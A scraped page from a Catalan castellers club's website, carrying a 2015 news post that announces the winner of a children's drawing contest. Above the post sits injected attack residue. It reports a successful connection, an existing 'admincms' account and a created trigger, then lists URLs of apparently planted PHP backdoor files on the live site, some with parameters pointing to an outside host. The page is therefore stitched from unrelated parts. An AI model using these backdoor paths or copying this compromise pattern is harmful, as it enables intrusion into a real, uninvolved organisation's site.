Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax https://castellersdeberga.cat/wp-admin/includes/update-cron-private.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/site-themes-private-core.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/themes-meta-meta-wp-private-ajax-core-core-stream-cron.php https://castellersdeberga.cat/wp-content/plugins/revslider/revslider-ajax-wp-wp-stream-core.php https://castellersdeberga.cat/wp-content/plugins/revslider/uninstall-ajax-core-ajax-response-private-ajax-meta-stream-ajax-core.php https://castellersdeberga.cat/wp-includes/class-wp-role-meta-private.php https://castellersdeberga.cat/wp-includes/class-wp-date-query-private-ajax.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Guanyador Concurs de Dibuix
 

Guanyador Concurs de Dibuix


Guanyador Concurs de DibuixJa tenim guanyador del concurs de Dibuix de Canalla 2015. Després d’una decisió molt difícil perquè teníem al davant més de 700 obres creades per petits artistes. El jurat ha decidit atorgar el primer premi del concurs al Guillem, de P5, de l’Escola de Gironella.
Enhorabona! Aquest serà el dibuix que lluirà la canalla a la samarreta d’aquesta temporada! A més, el Guillem i els seus companys de classe rebran una samarreta amb aquest fantàstic disseny i podran rebre un dels nostres tallers de castells.
Enhorabona a tots i a totes i moltes gràcies per participar! Sou tots uns artistes!